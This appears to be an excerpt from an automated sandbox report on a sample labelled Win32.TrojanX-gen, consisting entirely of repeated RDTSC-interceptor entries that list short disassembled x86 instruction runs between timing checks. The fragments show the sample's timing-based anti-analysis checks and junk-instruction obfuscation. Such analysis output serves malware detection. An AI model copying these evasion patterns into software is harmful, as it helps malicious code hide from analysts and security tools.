Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF79D8 second address: CF7A04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F59Bh 0x00000007 jbe 00007F362081F596h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F362081F5A4h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF7B71 second address: CF7B75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF7B75 second address: CF7B7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF7B7B second address: CF7BAA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jne 00007F3620DC90F6h 0x00000009 pop edx 0x0000000a jmp 00007F3620DC9101h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F3620DC9100h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF7BAA second address: CF7BB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF7D28 second address: CF7D40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F3620DC9102h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF7D40 second address: CF7D44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF7D44 second address: CF7D5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007F3620DC90FEh 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF7D5C second address: CF7D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CFB17F second address: CFB189 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F3620DC90F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CFB189 second address: CFB18D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CFB2A2 second address: CFB2CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F3620DC910Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CFB2CA second address: CFB2EA instructions: 0x00000000 rdtsc 0x00000002 jne 00007F362081F5A5h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CFB2EA second address: CFB2EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CFB2EE second address: CFB2FB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F362081F596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CFB2FB second address: CFB357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jc 00007F3620DC90FEh 0x00000010 je 00007F3620DC90F8h 0x00000016 pushad 0x00000017 popad 0x00000018 pop eax 0x00000019 adc dx, CF61h 0x0000001e lea ebx, dword ptr [ebp+1246008Bh] 0x00000024 call 00007F3620DC9105h 0x00000029 add ecx, dword ptr [ebp+122D1D3Bh] 0x0000002f pop ecx 0x00000030 xchg eax, ebx 0x00000031 pushad 0x00000032 push ebx 0x00000033 jmp 00007F3620DC9104h 0x00000038 pop ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CFB357 second address: CFB35B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CFB35B second address: CFB368 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CFB3E6 second address: CFB3EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CFB3EB second address: CFB46E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3620DC90FCh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007F3620DC90F8h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a ja 00007F3620DC9108h 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+122D2941h], eax 0x00000038 call 00007F3620DC90F9h 0x0000003d jbe 00007F3620DC90FAh 0x00000043 push edx 0x00000044 push eax 0x00000045 pop eax 0x00000046 pop edx 0x00000047 push eax 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F3620DC9105h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CFB46E second address: CFB477 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CFB477 second address: CFB4BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3620DC9105h 0x00000009 popad 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f js 00007F3620DC9100h 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jnl 00007F3620DC90F6h 0x0000001e popad 0x0000001f mov eax, dword ptr [eax] 0x00000021 push edi 0x00000022 jnp 00007F3620DC90F8h 0x00000028 pop edi 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 pushad 0x00000031 popad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CFB4BD second address: CFB4C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CFB4C2 second address: CFB51F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC90FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a add ecx, dword ptr [ebp+122D2E15h] 0x00000010 push 00000003h 0x00000012 push 00000000h 0x00000014 xor edi, 11E05A51h 0x0000001a mov edi, 19AAD3DAh 0x0000001f push 00000003h 0x00000021 push 00000000h 0x00000023 push edx 0x00000024 call 00007F3620DC90F8h 0x00000029 pop edx 0x0000002a mov dword ptr [esp+04h], edx 0x0000002e add dword ptr [esp+04h], 00000017h 0x00000036 inc edx 0x00000037 push edx 0x00000038 ret 0x00000039 pop edx 0x0000003a ret 0x0000003b mov esi, 31A9A3B8h 0x00000040 push 8E0E82A2h 0x00000045 jp 00007F3620DC9118h 0x0000004b push eax 0x0000004c push edx 0x0000004d jbe 00007F3620DC90F6h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CFB5B6 second address: CFB64F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F362081F59Fh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F362081F5A7h 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 popad 0x00000017 nop 0x00000018 mov si, 3321h 0x0000001c push 00000000h 0x0000001e or dword ptr [ebp+122D228Dh], ecx 0x00000024 push 9E31F3EFh 0x00000029 jmp 00007F362081F59Fh 0x0000002e add dword ptr [esp], 61CE0C91h 0x00000035 mov edi, 79869BC2h 0x0000003a push 00000003h 0x0000003c mov dx, 03A7h 0x00000040 push 00000000h 0x00000042 mov di, B2A6h 0x00000046 push 00000003h 0x00000048 jmp 00007F362081F5A6h 0x0000004d xor esi, dword ptr [ebp+122D2DB1h] 0x00000053 push A7BB5007h 0x00000058 push eax 0x00000059 push edx 0x0000005a jbe 00007F362081F59Ch 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CFB64F second address: CFB653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D1A256 second address: D1A25A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D1A9D6 second address: D1A9DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D1A9DA second address: D1A9E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D1A9E6 second address: D1A9F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 jbe 00007F3620DC90F6h 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D1A9F5 second address: D1AA01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F362081F596h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D1AE56 second address: D1AE62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jg 00007F3620DC90F6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D1AE62 second address: D1AE96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F59Ah 0x00000007 jmp 00007F362081F59Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F362081F5A6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CEA5F0 second address: CEA5F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CEA5F8 second address: CEA60A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F362081F59Ah 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D1B6DB second address: D1B6DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D1B6DF second address: D1B6E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D1B9A3 second address: D1B9BA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F3620DC90FEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D1FE05 second address: D1FE0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D1FE0B second address: D1FE30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC9109h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D22A23 second address: D22A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D22A2E second address: D22A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CDCDDF second address: CDCDE4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D27CB1 second address: D27CB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D271F3 second address: D27212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F362081F5A6h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D27212 second address: D27216 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D27216 second address: D2721C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2721C second address: D27224 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D27224 second address: D27258 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F362081F596h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007F362081F598h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push ebx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 pop ebx 0x00000019 jmp 00007F362081F5A5h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D277A4 second address: D277A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D27945 second address: D27950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D27AC5 second address: D27AE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3620DC9103h 0x00000009 ja 00007F3620DC90F6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D27AE2 second address: D27AFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F5A6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A569 second address: D2A57A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3620DC90FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A57A second address: D2A58F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F362081F598h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A58F second address: D2A593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A593 second address: D2A5A1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F362081F596h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A5A1 second address: D2A5A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A5A5 second address: D2A5B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F362081F598h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A5B8 second address: D2A5C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3620DC90FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A5C8 second address: D2A645 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F5A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 jmp 00007F362081F5A7h 0x00000015 jmp 00007F362081F5A1h 0x0000001a popad 0x0000001b pop eax 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f call 00007F362081F598h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], esi 0x00000029 add dword ptr [esp+04h], 0000001Dh 0x00000031 inc esi 0x00000032 push esi 0x00000033 ret 0x00000034 pop esi 0x00000035 ret 0x00000036 push F2919ED9h 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A645 second address: D2A649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A9C1 second address: D2A9D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F362081F596h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A9D0 second address: D2A9F6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3620DC90F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F3620DC9108h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A9F6 second address: D2A9FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2A9FC second address: D2AA00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2AB8D second address: D2AB91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2AB91 second address: D2AB97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2ACB8 second address: D2ACBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2ACBE second address: D2ACC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2B1F3 second address: D2B21E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F362081F5A4h 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007F362081F59Ch 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2B517 second address: D2B51B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2B6DE second address: D2B6E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2B6E2 second address: D2B6E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2B7AD second address: D2B7B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D2EBE8 second address: D2EBEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: D32320 second address: D32326 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
